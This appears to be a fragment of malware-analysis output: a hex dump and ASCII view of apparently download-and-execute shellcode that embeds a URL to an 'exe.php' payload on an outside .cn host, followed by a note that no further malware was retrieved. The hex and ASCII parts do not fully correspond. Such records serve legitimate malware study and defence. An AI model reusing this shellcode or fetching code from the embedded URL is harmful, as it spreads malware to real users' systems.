64 99 cf ec 1c dc 26 a6  ae 42 ec 2c b9 dc 19 e0 
51 ff d5 1d 9b e7 2e 21  e2 ec 1d af 04 1e d4 11 
b1 9a 0a b5 64 04 64 b5  cb ec 32 89 64 e3 a4 64 
b5 f3 ec 32 64 eb 64 ec  2a b1 b2 2d e7 ef 07 1b 
11 10 10 ba bd a3 a2 a0  a1 ef 68 74 74 70 3a 2f 
2f 67 75 6b 67 69 66 6f  63 2e 63 6e 2f 6e 75 63 
2f 65 78 65 2e 70 68 70  

CCCC..[3.f....3.
C...........N...
.d..d..Bd..n....
.d...a........f.
...w.e......f...
.._.-.....f.....
!...;...f.......
W.)...f...o.,..f
........f..d....
.d....d.........
.x...f..d*l/.f..
......d.....d...
.......(.....(..
.......d.....d..
............4...
....d.....d.....
.......d.....d..
.......d.....d..
................
l....d5......d.d
..d...d..d......
d.....&..B.,....
Q......!........
....d.d...2.d..d
...2d.d.*..-....
..........http:/
/gukgifoc.cn/nuc
/exe.php

No additional malware was retrieved.